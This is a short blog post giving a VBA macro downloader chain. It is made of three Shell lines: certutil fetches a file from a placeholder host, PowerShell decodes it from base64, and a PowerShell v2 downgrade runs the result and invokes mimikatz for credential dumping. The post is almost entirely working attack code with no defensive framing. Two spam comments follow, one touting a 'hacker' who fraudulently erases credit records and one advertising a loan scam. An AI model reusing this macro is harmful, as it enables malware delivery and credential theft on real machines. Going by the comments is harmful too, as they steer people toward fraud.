Thursday, January 13, 2022

VBA Macro downloader invoke-mimikatz

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")


Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")


Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")



2 comments:

  1. I was depressed some Months ago due to how frustrating it is dealing with bad credits, but reaching out to HACK VANISH via Phone: +1 (747) 293-8514 and Email: HACK VANISH (@) GMAIL. COM gave my life a new meaning, after I found him credible through positive reviews I read on a credit blog, in a twinkle of an eye, this great hacker got my credit score restored from 509 to 784 across the 3 major credit bureaus, all evictions and repossession has been wiped off, my LexisNexis and Chex system fixed respectively, to my greatest surprise, some days later, I received an E-mail confirming the approval of my pending loan application. I can confidently say 2021 was an exceptional year for my husband and I as we are proud owners of a new home and a brand-new SUV courtesy HACK VANISH, I would definitely recommend him to anyone in need of a genuine Hacker.

    ReplyDelete
  2. Fast cash offer for you today at just 3% interest rate, both long and short term cash of all amounts and currencies, no collateral required. Apply now for your instant approval financialserviceoffer876@gmail.com WhatsApp +918929509036

    ReplyDelete